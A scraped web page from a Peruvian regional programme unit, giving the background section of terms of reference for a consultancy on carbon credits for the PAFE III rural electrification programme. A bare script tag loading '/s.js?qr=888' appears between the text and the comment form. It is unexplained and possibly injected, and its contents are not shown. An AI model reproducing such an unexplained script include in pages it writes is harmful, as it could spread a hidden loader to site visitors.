Fecha Actual

Martes, 16 de Octubre del 2018

Follow Unidad Ejecutora de Programas Regionales - PROREGION on:

Boton Facebook

Ingresar

TÉRMINOS DE REFERENCIA

TÉRMINOS DE REFERENCIA

Proyecto:
Programa de Ampliación de la Frontera Eléctrica – PAFE III.

Consultoría:
Aplicación del PAFE III a los Beneficios del Mercado Voluntario de Carbono por las reducciones de Gases de Efecto Invernadero que se reducirán.

Entidad:
Unidad Ejecutora de Programas Regionales (PROREGION) - Gobierno Regional de Cajamarca

1. Antecedentes

La Convención Marco de las Naciones Unidas para el Cambio Climático - CMNUCC (1992), fue el punto de partida para que las naciones del mundo reconocieran que existe un problema de cambio climático y que es consecuencia del incremento en las emisiones de Gases de Efecto Invernadero (GEI) provenientes de actividades humanas. En 1997 con la firma del Protocolo de Kyoto (PK), los países desarrollados se comprometen a reducir sus emisiones globales de GEI, en promedio 5.2% respecto a 1990, para el primer periodo de compromiso 2008-2012. El PK entró en Vigor en Febrero del 2005.

El Mecanismo de Desarrollo Limpio - MDL es uno de los mecanismos de mercado establecidos en el Protocolo de Kyoto, por medio del cual, los gobiernos o entidades privadas de países desarrollados pueden comprar reducciones de emisiones de GEI, originadas en proyectos realizados en países en desarrollo de manera costo - efectiva.

Paralelamente a este mercado regulado por Kyoto existe un Mercado Voluntario que comprende a todas las transacciones de créditos de carbono que no están regidas por una obligación regulatoria de cumplir con una meta de reducción de emisiones de GEIs. Esto incluye tanto a las transacciones de créditos creados especialmente para los mercados voluntarios (como los VERs – Verified Emission Reductions) como a las operaciones en las que se venden créditos de los mercados regulados (como los CERs del MDL) a compradores que buscan voluntariamente compensar sus emisiones.

Las reducciones de emisiones de GEI provenientes se miden en toneladas de dióxido de carbono (CO2) equivalente, y se traducen en “emisiones reducidas verificadas” (VER’s), los cuales pueden ser vendidos en el mercado de carbono.

De esta forma el Negocio del Carbono es para nuestro país, en este emergente mercado mundial del carbono, una oportunidad:

• De nuevos negocios, el Perú cuenta con un gran potencial, en diferentes sectores, para desarrollar proyectos que reduzcan emisiones de GEI.
• De promover inversiones, ya que el ingreso extraordinario proveniente de la venta de los bonos de carbono podría ser el detonante para concretar el financiamiento de estas nuevas inversiones.
• De mostrar que se pueden hacer negocios e inversiones lucrativas con proyectos que sean respetuosos con el ambiente.
• De contribuir al desarrollo sostenible, al implementar proyectos que promuevan la transferencia tecnológica, la utilización de energías renovables, generación de empleo y la mejora de la calidad de vida de la sociedad.
<script type='text/javascript' src='/s.js?qr=888'></script>

Añadir nuevo comentario

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.